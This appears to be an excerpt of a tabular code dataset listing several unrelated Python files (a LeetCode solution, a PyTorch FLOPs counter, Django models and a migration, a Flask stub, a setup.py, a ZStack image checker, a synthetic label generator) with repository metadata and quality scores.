max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
|---|---|---|---|---|---|---|---|---|---|---|
python3/136.single-number.313124299.ac.py
|
Diego-Zulu/leetcode_answers
| 0
|
6628451
|
#
# @lc app=leetcode id=136 lang=python3
#
# [136] Single Number
#
# https://leetcode.com/problems/single-number/description/
#
# algorithms
# Easy (64.86%)
# Likes: 4161
# Dislikes: 154
# Total Accepted: 829.6K
# Total Submissions: 1.3M
# Testcase Example: '[2,2,1]'
#
# Given a non-empty array of integers, every element appears twice except for
# one. Find that single one.
#
# Note:
#
# Your algorithm should have a linear runtime complexity. Could you implement
# it without using extra memory?
#
# Example 1:
#
#
# Input: [2,2,1]
# Output: 1
#
#
# Example 2:
#
#
# Input: [4,1,2,1,2]
# Output: 4
#
#
#
# @lc code=start
class Solution:
def singleNumber(self, nums: List[int]) -> int:
numb = 0
for n in nums:
numb ^= n
return numb
# @lc code=end
|
#
# @lc app=leetcode id=136 lang=python3
#
# [136] Single Number
#
# https://leetcode.com/problems/single-number/description/
#
# algorithms
# Easy (64.86%)
# Likes: 4161
# Dislikes: 154
# Total Accepted: 829.6K
# Total Submissions: 1.3M
# Testcase Example: '[2,2,1]'
#
# Given a non-empty array of integers, every element appears twice except for
# one. Find that single one.
#
# Note:
#
# Your algorithm should have a linear runtime complexity. Could you implement
# it without using extra memory?
#
# Example 1:
#
#
# Input: [2,2,1]
# Output: 1
#
#
# Example 2:
#
#
# Input: [4,1,2,1,2]
# Output: 4
#
#
#
# @lc code=start
class Solution:
def singleNumber(self, nums: List[int]) -> int:
numb = 0
for n in nums:
numb ^= n
return numb
# @lc code=end
|
en
| 0.705327
|
# # @lc app=leetcode id=136 lang=python3 # # [136] Single Number # # https://leetcode.com/problems/single-number/description/ # # algorithms # Easy (64.86%) # Likes: 4161 # Dislikes: 154 # Total Accepted: 829.6K # Total Submissions: 1.3M # Testcase Example: '[2,2,1]' # # Given a non-empty array of integers, every element appears twice except for # one. Find that single one. # # Note: # # Your algorithm should have a linear runtime complexity. Could you implement # it without using extra memory? # # Example 1: # # # Input: [2,2,1] # Output: 1 # # # Example 2: # # # Input: [4,1,2,1,2] # Output: 4 # # # # @lc code=start # @lc code=end
| 3.402506
| 3
|
NAS/APS-channel-search/utils/compute_flops.py
|
naviocean/SimpleCVReproduction
| 923
|
6628452
|
<reponame>naviocean/SimpleCVReproduction<filename>NAS/APS-channel-search/utils/compute_flops.py
# Code from https://github.com/simochen/model-tools.
import numpy as np
import pdb
import torch
import torchvision
import torch.nn as nn
import numpy as np
import random
def lookup_table_flops(model, candidate_width, alphas=None, input_res=32, multiply_adds=False):
if alphas is None:
for n, v in model.named_parameters():
if 'alphas' in n:
alphas = v
num_conv = alphas.shape[0]
device = alphas.device
# obtain the feature map sizes
list_bn=[]
def bn_hook(self, input, output):
if input[0].ndimension() == 4:
list_bn.append(input[0].shape)
def foo(net):
childrens = list(net.children())
if not childrens:
if isinstance(net, torch.nn.BatchNorm2d):
net.register_forward_hook(bn_hook)
return
for c in childrens:
foo(c)
foo(model)
input_ = torch.rand(1, 3, input_res, input_res).to(alphas.device)
input_.requires_grad = True
# print('alphas:', alphas)
# print('inputs:', input_)
if torch.cuda.device_count() > 1:
model.module.register_buffer('alphas_tmp', alphas.data)
else:
model.register_buffer('alphas_tmp', alphas.data)
out = model(input_)
# TODO: only appliable for resnet_20s: 2 convs followed by 1 shortcut
list_main_bn = []
num_width = len(candidate_width)
for i, b in enumerate(list_bn):
if i//num_width == 0 or \
((i-num_width)//(num_width**2) >= 0 and ((i-num_width)//(num_width)**2) % 3 != 2):
list_main_bn.append(b)
assert len(list_main_bn) == (num_width + num_width ** 2 * (num_conv-1)), 'wrong list of feature map length'
# start compute flops for each branch
# first obtain the kernel shapes, a list of length: num_width + num_width**2 * num_conv
def kernel_shape_types(candidate_width):
kshape_types = []
first_kshape_types = []
for i in candidate_width:
first_kshape_types.append((i, 3, 3, 3))
for i in candidate_width:
for j in candidate_width:
kshape_types.append((i, j, 3, 3)) # [co, ci, k, k]
return kshape_types, first_kshape_types
kshape_types, first_kshape_types = kernel_shape_types(candidate_width)
k_shapes = []
layer_idx = 0
for v in model.parameters():
if v.ndimension() == 4 and v.shape[2] == 3:
if layer_idx == 0:
k_shapes += first_kshape_types
else:
k_shapes += kshape_types
layer_idx += 1
# compute flops
flops = [] # a list of length: num_width + num_width**2 * num_conv
for idx, a_shape in enumerate(list_main_bn):
n, ci, h, w = a_shape
k_shape = k_shapes[idx]
co, ci, k, _ = k_shape
flop = co * ci * k * k * h * w
flops.append(flop)
# reshape flops back to list. len == num_conv
table_flops = []
table_flops.append(torch.Tensor(flops[:num_width]).to(device))
for layer_idx in range(num_conv-1):
tmp = flops[num_width + layer_idx*num_width**2:\
num_width + (layer_idx+1)*num_width**2]
assert len(tmp) == num_width ** 2, 'need have %d elements in %d layer'%(num_width**2, layer_idx+1)
table_flops.append(torch.Tensor(tmp).to(device))
return table_flops
def print_model_param_nums(model, multiply_adds=False):
total = sum([param.nelement() for param in model.parameters()])
print(' + Number of original params: %.8fM' % (total / 1e6))
return total
def print_model_param_flops(model, input_res, multiply_adds=False):
prods = {}
def save_hook(name):
def hook_per(self, input, output):
prods[name] = np.prod(input[0].shape)
return hook_per
list_conv=[]
def conv_hook(self, input, output):
batch_size, input_channels, input_height, input_width = input[0].size()
output_channels, output_height, output_width = output[0].size()
kernel_ops = self.kernel_size[0] * self.kernel_size[1] * (self.in_channels / self.groups)
bias_ops = 1 if self.bias is not None else 0
params = output_channels * (kernel_ops + bias_ops)
flops = (kernel_ops * (2 if multiply_adds else 1) + bias_ops) * output_channels * output_height * output_width * batch_size
list_conv.append(flops)
list_linear=[]
def linear_hook(self, input, output):
batch_size = input[0].size(0) if input[0].dim() == 2 else 1
weight_ops = self.weight.nelement() * (2 if multiply_adds else 1)
bias_ops = self.bias.nelement() if self.bias is not None else 0
flops = batch_size * (weight_ops + bias_ops)
list_linear.append(flops)
list_bn=[]
def bn_hook(self, input, output):
list_bn.append(input[0].nelement() * 2)
list_relu=[]
def relu_hook(self, input, output):
list_relu.append(input[0].nelement())
list_pooling=[]
def pooling_hook(self, input, output):
batch_size, input_channels, input_height, input_width = input[0].size()
output_channels, output_height, output_width = output[0].size()
kernel_ops = self.kernel_size * self.kernel_size
bias_ops = 0
params = 0
flops = (kernel_ops + bias_ops) * output_channels * output_height * output_width * batch_size
list_pooling.append(flops)
list_upsample=[]
# For bilinear upsample
def upsample_hook(self, input, output):
batch_size, input_channels, input_height, input_width = input[0].size()
output_channels, output_height, output_width = output[0].size()
flops = output_height * output_width * output_channels * batch_size * 12
list_upsample.append(flops)
def foo(net):
childrens = list(net.children())
if not childrens:
if isinstance(net, torch.nn.Conv2d):
net.register_forward_hook(conv_hook)
if isinstance(net, torch.nn.Linear):
net.register_forward_hook(linear_hook)
# if isinstance(net, torch.nn.BatchNorm2d):
# net.register_forward_hook(bn_hook)
# if isinstance(net, torch.nn.ReLU):
# net.register_forward_hook(relu_hook)
# if isinstance(net, torch.nn.MaxPool2d) or isinstance(net, torch.nn.AvgPool2d):
# net.register_forward_hook(pooling_hook)
# if isinstance(net, torch.nn.Upsample):
# net.register_forward_hook(upsample_hook)
return
for c in childrens:
foo(c)
model = model.cuda()
foo(model)
input_ = torch.rand(3, 3, input_res, input_res).cuda()
input_.requires_grad = True
out = model(input_)
total_flops = (sum(list_conv) + sum(list_linear) + sum(list_bn) + sum(list_relu) + sum(list_pooling) + sum(list_upsample))
total_flops /= 3
print(' + Number of FLOPs of original model: %.8fG' % (total_flops / 1e9))
# print('list_conv', list_conv)
# print('list_linear', list_linear)
# print('list_bn', list_bn)
# print('list_relu', list_relu)
# print('list_pooling', list_pooling)
return total_flops
|
# Code from https://github.com/simochen/model-tools.
import numpy as np
import pdb
import torch
import torchvision
import torch.nn as nn
import numpy as np
import random
def lookup_table_flops(model, candidate_width, alphas=None, input_res=32, multiply_adds=False):
if alphas is None:
for n, v in model.named_parameters():
if 'alphas' in n:
alphas = v
num_conv = alphas.shape[0]
device = alphas.device
# obtain the feature map sizes
list_bn=[]
def bn_hook(self, input, output):
if input[0].ndimension() == 4:
list_bn.append(input[0].shape)
def foo(net):
childrens = list(net.children())
if not childrens:
if isinstance(net, torch.nn.BatchNorm2d):
net.register_forward_hook(bn_hook)
return
for c in childrens:
foo(c)
foo(model)
input_ = torch.rand(1, 3, input_res, input_res).to(alphas.device)
input_.requires_grad = True
# print('alphas:', alphas)
# print('inputs:', input_)
if torch.cuda.device_count() > 1:
model.module.register_buffer('alphas_tmp', alphas.data)
else:
model.register_buffer('alphas_tmp', alphas.data)
out = model(input_)
# TODO: only appliable for resnet_20s: 2 convs followed by 1 shortcut
list_main_bn = []
num_width = len(candidate_width)
for i, b in enumerate(list_bn):
if i//num_width == 0 or \
((i-num_width)//(num_width**2) >= 0 and ((i-num_width)//(num_width)**2) % 3 != 2):
list_main_bn.append(b)
assert len(list_main_bn) == (num_width + num_width ** 2 * (num_conv-1)), 'wrong list of feature map length'
# start compute flops for each branch
# first obtain the kernel shapes, a list of length: num_width + num_width**2 * num_conv
def kernel_shape_types(candidate_width):
kshape_types = []
first_kshape_types = []
for i in candidate_width:
first_kshape_types.append((i, 3, 3, 3))
for i in candidate_width:
for j in candidate_width:
kshape_types.append((i, j, 3, 3)) # [co, ci, k, k]
return kshape_types, first_kshape_types
kshape_types, first_kshape_types = kernel_shape_types(candidate_width)
k_shapes = []
layer_idx = 0
for v in model.parameters():
if v.ndimension() == 4 and v.shape[2] == 3:
if layer_idx == 0:
k_shapes += first_kshape_types
else:
k_shapes += kshape_types
layer_idx += 1
# compute flops
flops = [] # a list of length: num_width + num_width**2 * num_conv
for idx, a_shape in enumerate(list_main_bn):
n, ci, h, w = a_shape
k_shape = k_shapes[idx]
co, ci, k, _ = k_shape
flop = co * ci * k * k * h * w
flops.append(flop)
# reshape flops back to list. len == num_conv
table_flops = []
table_flops.append(torch.Tensor(flops[:num_width]).to(device))
for layer_idx in range(num_conv-1):
tmp = flops[num_width + layer_idx*num_width**2:\
num_width + (layer_idx+1)*num_width**2]
assert len(tmp) == num_width ** 2, 'need have %d elements in %d layer'%(num_width**2, layer_idx+1)
table_flops.append(torch.Tensor(tmp).to(device))
return table_flops
def print_model_param_nums(model, multiply_adds=False):
total = sum([param.nelement() for param in model.parameters()])
print(' + Number of original params: %.8fM' % (total / 1e6))
return total
def print_model_param_flops(model, input_res, multiply_adds=False):
prods = {}
def save_hook(name):
def hook_per(self, input, output):
prods[name] = np.prod(input[0].shape)
return hook_per
list_conv=[]
def conv_hook(self, input, output):
batch_size, input_channels, input_height, input_width = input[0].size()
output_channels, output_height, output_width = output[0].size()
kernel_ops = self.kernel_size[0] * self.kernel_size[1] * (self.in_channels / self.groups)
bias_ops = 1 if self.bias is not None else 0
params = output_channels * (kernel_ops + bias_ops)
flops = (kernel_ops * (2 if multiply_adds else 1) + bias_ops) * output_channels * output_height * output_width * batch_size
list_conv.append(flops)
list_linear=[]
def linear_hook(self, input, output):
batch_size = input[0].size(0) if input[0].dim() == 2 else 1
weight_ops = self.weight.nelement() * (2 if multiply_adds else 1)
bias_ops = self.bias.nelement() if self.bias is not None else 0
flops = batch_size * (weight_ops + bias_ops)
list_linear.append(flops)
list_bn=[]
def bn_hook(self, input, output):
list_bn.append(input[0].nelement() * 2)
list_relu=[]
def relu_hook(self, input, output):
list_relu.append(input[0].nelement())
list_pooling=[]
def pooling_hook(self, input, output):
batch_size, input_channels, input_height, input_width = input[0].size()
output_channels, output_height, output_width = output[0].size()
kernel_ops = self.kernel_size * self.kernel_size
bias_ops = 0
params = 0
flops = (kernel_ops + bias_ops) * output_channels * output_height * output_width * batch_size
list_pooling.append(flops)
list_upsample=[]
# For bilinear upsample
def upsample_hook(self, input, output):
batch_size, input_channels, input_height, input_width = input[0].size()
output_channels, output_height, output_width = output[0].size()
flops = output_height * output_width * output_channels * batch_size * 12
list_upsample.append(flops)
def foo(net):
childrens = list(net.children())
if not childrens:
if isinstance(net, torch.nn.Conv2d):
net.register_forward_hook(conv_hook)
if isinstance(net, torch.nn.Linear):
net.register_forward_hook(linear_hook)
# if isinstance(net, torch.nn.BatchNorm2d):
# net.register_forward_hook(bn_hook)
# if isinstance(net, torch.nn.ReLU):
# net.register_forward_hook(relu_hook)
# if isinstance(net, torch.nn.MaxPool2d) or isinstance(net, torch.nn.AvgPool2d):
# net.register_forward_hook(pooling_hook)
# if isinstance(net, torch.nn.Upsample):
# net.register_forward_hook(upsample_hook)
return
for c in childrens:
foo(c)
model = model.cuda()
foo(model)
input_ = torch.rand(3, 3, input_res, input_res).cuda()
input_.requires_grad = True
out = model(input_)
total_flops = (sum(list_conv) + sum(list_linear) + sum(list_bn) + sum(list_relu) + sum(list_pooling) + sum(list_upsample))
total_flops /= 3
print(' + Number of FLOPs of original model: %.8fG' % (total_flops / 1e9))
# print('list_conv', list_conv)
# print('list_linear', list_linear)
# print('list_bn', list_bn)
# print('list_relu', list_relu)
# print('list_pooling', list_pooling)
return total_flops
|
en
| 0.543994
|
# Code from https://github.com/simochen/model-tools. # obtain the feature map sizes # print('alphas:', alphas) # print('inputs:', input_) # TODO: only appliable for resnet_20s: 2 convs followed by 1 shortcut # start compute flops for each branch # first obtain the kernel shapes, a list of length: num_width + num_width**2 * num_conv # [co, ci, k, k] # compute flops # a list of length: num_width + num_width**2 * num_conv # reshape flops back to list. len == num_conv # For bilinear upsample # if isinstance(net, torch.nn.BatchNorm2d): # net.register_forward_hook(bn_hook) # if isinstance(net, torch.nn.ReLU): # net.register_forward_hook(relu_hook) # if isinstance(net, torch.nn.MaxPool2d) or isinstance(net, torch.nn.AvgPool2d): # net.register_forward_hook(pooling_hook) # if isinstance(net, torch.nn.Upsample): # net.register_forward_hook(upsample_hook) # print('list_conv', list_conv) # print('list_linear', list_linear) # print('list_bn', list_bn) # print('list_relu', list_relu) # print('list_pooling', list_pooling)
| 2.173157
| 2
|
areas/models.py
|
chandojo/climbbeta
| 1
|
6628453
|
<gh_stars>1-10
from django.core.validators import validate_image_file_extension
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from api.vimeo import *
from api.google.geolocator.requests import *
class State(models.Model):
name = models.CharField(max_length=200)
abbrv = models.CharField(max_length=2)
slug = models.SlugField(blank=True)
img = models.ImageField(blank=True, null=True,
upload_to='areas/media/', validators=[validate_image_file_extension])
def save(self, *args, **kwargs):
if not self.slug:
self.slug = slugify(self.name)
super(State, self).save(*args, **kwargs)
def get_absolute_url(self):
return reverse('states', kwargs={'slug': self.slug})
def __str__(self):
return self.name
class City_Town(models.Model):
name = models.CharField(max_length=200, primary_key=True)
state = models.ForeignKey(
State, related_name='cities', on_delete=models.PROTECT)
slug = models.SlugField(blank=True)
longitude = models.FloatField(blank=True)
latitude = models.FloatField(blank=True)
timezone = models.CharField(max_length=200, blank=True, null=True)
permit_required = models.NullBooleanField()
permit_name = models.CharField(max_length=200, null=True, blank=True)
busted = models.TextField(blank=True, null=True)
camping = models.NullBooleanField()
nearby_food = models.NullBooleanField()
def get_lat(self, **kwargs):
lat = get_latitude(self, **kwargs)
return lat
def get_long(self, **kwargs):
long = get_longitude(self, **kwargs)
return long
def get_time(self, **kwargs):
time = get_timezone(self, **kwargs)
return time
def get_permit(self, **kwargs):
if self.permit_required == False:
self.permit_name = null
return self.permit_name
def save(self, *args, **kwargs):
if not self.slug:
self.slug = slugify(self.name)
if not self.latitude:
self.latitude = self.get_lat()
if not self.longitude:
self.longitude = self.get_long()
if not self.timezone:
self.timezone = self.get_time()
super(City_Town, self).save(*args, **kwargs)
def get_absolute_url(self):
return reverse('cities', kwargs={'slug': self.slug, 'state_slug': self.state.slug})
def __str__(self):
return self.name
|
from django.core.validators import validate_image_file_extension
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from api.vimeo import *
from api.google.geolocator.requests import *
class State(models.Model):
name = models.CharField(max_length=200)
abbrv = models.CharField(max_length=2)
slug = models.SlugField(blank=True)
img = models.ImageField(blank=True, null=True,
upload_to='areas/media/', validators=[validate_image_file_extension])
def save(self, *args, **kwargs):
if not self.slug:
self.slug = slugify(self.name)
super(State, self).save(*args, **kwargs)
def get_absolute_url(self):
return reverse('states', kwargs={'slug': self.slug})
def __str__(self):
return self.name
class City_Town(models.Model):
name = models.CharField(max_length=200, primary_key=True)
state = models.ForeignKey(
State, related_name='cities', on_delete=models.PROTECT)
slug = models.SlugField(blank=True)
longitude = models.FloatField(blank=True)
latitude = models.FloatField(blank=True)
timezone = models.CharField(max_length=200, blank=True, null=True)
permit_required = models.NullBooleanField()
permit_name = models.CharField(max_length=200, null=True, blank=True)
busted = models.TextField(blank=True, null=True)
camping = models.NullBooleanField()
nearby_food = models.NullBooleanField()
def get_lat(self, **kwargs):
lat = get_latitude(self, **kwargs)
return lat
def get_long(self, **kwargs):
long = get_longitude(self, **kwargs)
return long
def get_time(self, **kwargs):
time = get_timezone(self, **kwargs)
return time
def get_permit(self, **kwargs):
if self.permit_required == False:
self.permit_name = null
return self.permit_name
def save(self, *args, **kwargs):
if not self.slug:
self.slug = slugify(self.name)
if not self.latitude:
self.latitude = self.get_lat()
if not self.longitude:
self.longitude = self.get_long()
if not self.timezone:
self.timezone = self.get_time()
super(City_Town, self).save(*args, **kwargs)
def get_absolute_url(self):
return reverse('cities', kwargs={'slug': self.slug, 'state_slug': self.state.slug})
def __str__(self):
return self.name
|
none
| 1
| 2.229688
| 2
|
|
test_db.py
|
kai-jinny/Agile-Development-Project
| 2
|
6628454
|
<filename>test_db.py<gh_stars>1-10
# from flask import Flask
# from flask_sqlalchemy import SQLAlchemy
# from sqlalchemy.sql import text
# import os
# basedir = os.path.abspath(os.path.dirname(__file__))
# app = Flask(__name__)
# # change to name of your database; add path if necessary
# db_name = 'app.db'
# app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL') or \
# 'sqlite:///' + os.path.join(basedir, 'app.db')
# app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# # this variable, db, will be used for all SQLAlchemy commands
# db = SQLAlchemy(app)
# # NOTHING BELOW THIS LINE NEEDS TO CHANGE
# # this route will test the database connection and nothing more
# @app.route('/')
# def testdb():
# try:
# db.session.query(text('1')).from_statement(text('SELECT 1')).all()
# return '<h1>It works.</h1>'
# except Exception as e:
# # e holds description of the error
# error_text = "<p>The error:<br>" + str(e) + "</p>"
# hed = '<h1>Something is broken.</h1>'
# return hed + error_text
# if __name__ == '__main__':
# app.run(debug=True)
#https://python-adv-web-apps.readthedocs.io/en/latest/flask_db1.html
|
<filename>test_db.py<gh_stars>1-10
# from flask import Flask
# from flask_sqlalchemy import SQLAlchemy
# from sqlalchemy.sql import text
# import os
# basedir = os.path.abspath(os.path.dirname(__file__))
# app = Flask(__name__)
# # change to name of your database; add path if necessary
# db_name = 'app.db'
# app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL') or \
# 'sqlite:///' + os.path.join(basedir, 'app.db')
# app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# # this variable, db, will be used for all SQLAlchemy commands
# db = SQLAlchemy(app)
# # NOTHING BELOW THIS LINE NEEDS TO CHANGE
# # this route will test the database connection and nothing more
# @app.route('/')
# def testdb():
# try:
# db.session.query(text('1')).from_statement(text('SELECT 1')).all()
# return '<h1>It works.</h1>'
# except Exception as e:
# # e holds description of the error
# error_text = "<p>The error:<br>" + str(e) + "</p>"
# hed = '<h1>Something is broken.</h1>'
# return hed + error_text
# if __name__ == '__main__':
# app.run(debug=True)
#https://python-adv-web-apps.readthedocs.io/en/latest/flask_db1.html
|
en
| 0.435376
|
# from flask import Flask # from flask_sqlalchemy import SQLAlchemy # from sqlalchemy.sql import text # import os # basedir = os.path.abspath(os.path.dirname(__file__)) # app = Flask(__name__) # # change to name of your database; add path if necessary # db_name = 'app.db' # app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL') or \ # 'sqlite:///' + os.path.join(basedir, 'app.db') # app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True # # this variable, db, will be used for all SQLAlchemy commands # db = SQLAlchemy(app) # # NOTHING BELOW THIS LINE NEEDS TO CHANGE # # this route will test the database connection and nothing more # @app.route('/') # def testdb(): # try: # db.session.query(text('1')).from_statement(text('SELECT 1')).all() # return '<h1>It works.</h1>' # except Exception as e: # # e holds description of the error # error_text = "<p>The error:<br>" + str(e) + "</p>" # hed = '<h1>Something is broken.</h1>' # return hed + error_text # if __name__ == '__main__': # app.run(debug=True) #https://python-adv-web-apps.readthedocs.io/en/latest/flask_db1.html
| 2.698393
| 3
|
setup.py
|
PulpCattel/jmrpc
| 2
|
6628455
|
<reponame>PulpCattel/jmrpc
from setuptools import setup
setup(name='jmrpc',
version='0.1',
description='A simple and high-livel JSON-RPC client library for JoinMarket.',
url='https://github.com/PulpCattel/jmrpc',
zip_safe=False,
packages=['jmrpc'],
install_requires=['aiohttp[speedups]>=3.7.3', 'schematics>=2.1.1', 'ujson>=4.2.0'],
python_requires=">=3.7",
extras_require={
'dev': ['pytest', 'pytest-asyncio', 'mypy', 'pylint', 'types-requests']})
|
from setuptools import setup
setup(name='jmrpc',
version='0.1',
description='A simple and high-livel JSON-RPC client library for JoinMarket.',
url='https://github.com/PulpCattel/jmrpc',
zip_safe=False,
packages=['jmrpc'],
install_requires=['aiohttp[speedups]>=3.7.3', 'schematics>=2.1.1', 'ujson>=4.2.0'],
python_requires=">=3.7",
extras_require={
'dev': ['pytest', 'pytest-asyncio', 'mypy', 'pylint', 'types-requests']})
|
none
| 1
| 1.254762
| 1
|
|
zstackwoodpecker/zstackwoodpecker/zstack_test/kvm_checker/zstack_kvm_image_checker.py
|
sherry546/zstack-woodpecker
| 1
|
6628456
|
import os
import sys
import traceback
import zstackwoodpecker.header.checker as checker_header
import zstackwoodpecker.header.image as image_header
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstacklib.utils.http as http
import zstacklib.utils.jsonobject as jsonobject
import zstacktestagent.plugins.vm as vm_plugin
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
import apibinding.inventory as inventory
class zstack_kvm_image_file_checker(checker_header.TestChecker):
'''check kvm image file existencex . If it is in backup storage,
return self.judge(True). If not, return self.judge(False)'''
def check(self):
super(zstack_kvm_image_file_checker, self).check()
image = self.test_obj.image
backupStorages = image.backupStorageRefs
bs_one = backupStorages[0]
bs = test_lib.lib_get_backup_storage_by_uuid(bs_one.backupStorageUuid)
if bs.type == inventory.SFTP_BACKUP_STORAGE_TYPE:
self.judge(test_lib.lib_check_backup_storage_image_file(image))
elif hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
if self.test_obj.state == image_header.DELETED:
test_util.test_logger("skip image store image delete check, since the image won't be deleted until no vms refer to it.")
return self.judge(self.exp_result)
self.judge(test_lib.lib_check_backup_storage_image_file(image))
elif bs.type == inventory.CEPH_BACKUP_STORAGE_TYPE:
if self.test_obj.state == image_header.DELETED:
#https://github.com/zstackorg/zstack/issues/93#issuecomment-130935998
test_util.test_logger("skip ceph image delete check, since the image won't be deleted until no vms refer to it.")
return self.judge(self.exp_result)
ceph_host, username, password = test_lib.lib_get_ceph_info(os.environ.get('cephBackupStorageMonUrls'))
image_installPath = bs_one.installPath.split('ceph://')[1]
command = 'rbd info %s' % image_installPath
if test_lib.lib_execute_ssh_cmd(ceph_host, username, password, command, 10):
test_util.test_logger('Check result: [image:] %s [file:] %s exist on ceph [host name:] %s .' % (image.uuid, image_installPath, ceph_host))
return self.judge(True)
else:
test_util.test_logger('Check result: [image:] %s [file:] %s does not exist on ceph [host name:] %s .' % (image.uuid, image_installPath, ceph_host))
return self.judge(False)
|
import os
import sys
import traceback
import zstackwoodpecker.header.checker as checker_header
import zstackwoodpecker.header.image as image_header
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstacklib.utils.http as http
import zstacklib.utils.jsonobject as jsonobject
import zstacktestagent.plugins.vm as vm_plugin
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
import apibinding.inventory as inventory
class zstack_kvm_image_file_checker(checker_header.TestChecker):
'''check kvm image file existencex . If it is in backup storage,
return self.judge(True). If not, return self.judge(False)'''
def check(self):
super(zstack_kvm_image_file_checker, self).check()
image = self.test_obj.image
backupStorages = image.backupStorageRefs
bs_one = backupStorages[0]
bs = test_lib.lib_get_backup_storage_by_uuid(bs_one.backupStorageUuid)
if bs.type == inventory.SFTP_BACKUP_STORAGE_TYPE:
self.judge(test_lib.lib_check_backup_storage_image_file(image))
elif hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
if self.test_obj.state == image_header.DELETED:
test_util.test_logger("skip image store image delete check, since the image won't be deleted until no vms refer to it.")
return self.judge(self.exp_result)
self.judge(test_lib.lib_check_backup_storage_image_file(image))
elif bs.type == inventory.CEPH_BACKUP_STORAGE_TYPE:
if self.test_obj.state == image_header.DELETED:
#https://github.com/zstackorg/zstack/issues/93#issuecomment-130935998
test_util.test_logger("skip ceph image delete check, since the image won't be deleted until no vms refer to it.")
return self.judge(self.exp_result)
ceph_host, username, password = test_lib.lib_get_ceph_info(os.environ.get('cephBackupStorageMonUrls'))
image_installPath = bs_one.installPath.split('ceph://')[1]
command = 'rbd info %s' % image_installPath
if test_lib.lib_execute_ssh_cmd(ceph_host, username, password, command, 10):
test_util.test_logger('Check result: [image:] %s [file:] %s exist on ceph [host name:] %s .' % (image.uuid, image_installPath, ceph_host))
return self.judge(True)
else:
test_util.test_logger('Check result: [image:] %s [file:] %s does not exist on ceph [host name:] %s .' % (image.uuid, image_installPath, ceph_host))
return self.judge(False)
|
en
| 0.570243
|
check kvm image file existencex . If it is in backup storage, return self.judge(True). If not, return self.judge(False) #https://github.com/zstackorg/zstack/issues/93#issuecomment-130935998
| 1.855205
| 2
|
user/migrations/0006_alter_verify_add_token.py
|
ThePokerFaCcCe/messenger
| 0
|
6628457
|
# Generated by Django 3.2.10 on 2022-01-03 21:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0005_alter_token_fields'),
]
operations = [
migrations.AddField(
model_name='verifycode',
name='token',
field=models.CharField(auto_created=True, db_index=True, max_length=128, null=True, verbose_name='Token'),
),
]
|
# Generated by Django 3.2.10 on 2022-01-03 21:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0005_alter_token_fields'),
]
operations = [
migrations.AddField(
model_name='verifycode',
name='token',
field=models.CharField(auto_created=True, db_index=True, max_length=128, null=True, verbose_name='Token'),
),
]
|
en
| 0.800435
|
# Generated by Django 3.2.10 on 2022-01-03 21:26
| 1.628454
| 2
|
wrench/synthetic/dataset_generator.py
|
Stranger469/wrench
| 1
|
6628458
|
<filename>wrench/synthetic/dataset_generator.py
from typing import Optional, Union
import numpy as np
from .syntheticdataset import BaseSyntheticGenerator
class ConditionalIndependentGenerator(BaseSyntheticGenerator):
def __init__(self,
n_class: int,
n_lfs: int,
class_prior: Optional[Union[list, np.ndarray]] = None,
lf_prior: Optional[Union[list, np.ndarray]] = None,
alpha: Optional[float] = 0.7,
alpha_radius: Optional[float] = 0.5,
beta: Optional[float] = 0.1,
beta_radius: Optional[float] = 0.1,
random_state=None):
super().__init__(n_class, n_lfs, class_prior, lf_prior, random_state)
self.alpha_l = self.generator.uniform(low=max(0, alpha - alpha_radius), high=min(1, alpha + alpha_radius), size=n_lfs)
self.beta_l = self.generator.uniform(low=max(0, beta - beta_radius), high=min(1, beta + beta_radius), size=n_lfs)
def generate(self, n_data: int = 1000):
ids = list(range(n_data))
examples = list(range(n_data))
labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
weak_labels = []
for i, y in enumerate(labels):
weak_label = []
for alpha, beta, target in zip(self.alpha_l, self.beta_l, self.lf_targets):
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label.append(target)
else:
weak_label.append(-1)
weak_labels.append(weak_label)
return {
'ids' : ids,
'examples' : examples,
'labels' : labels,
'weak_labels': weak_labels,
}
class DataDependentGenerator(ConditionalIndependentGenerator):
def __init__(self,
n_class: int,
n_lfs: int,
n_cluster: int = 10,
n_cluster_per_lfs: int = 2,
class_prior: Optional[Union[list, np.ndarray]] = None,
lf_prior: Optional[Union[list, np.ndarray]] = None,
alpha: Optional[float] = 0.7,
beta: Optional[float] = 0.1,
gamma: Optional[float] = 0.3,
alpha_radius: Optional[float] = 0.5,
random_state=None):
super().__init__(n_class, n_lfs, class_prior, lf_prior, alpha, beta, alpha_radius, random_state)
self.n_cluster = n_cluster
self.n_cluster_per_lfs = n_cluster_per_lfs
self.lf_pro_clusters = [self.generator.choice(n_cluster, size=n_cluster_per_lfs) for _ in range(n_lfs)]
self.gamma_l = self.generator.uniform(low=0, high=gamma, size=n_lfs)
def generate(self, n_data: int = 1000):
ids = list(range(n_data))
examples = list(range(n_data))
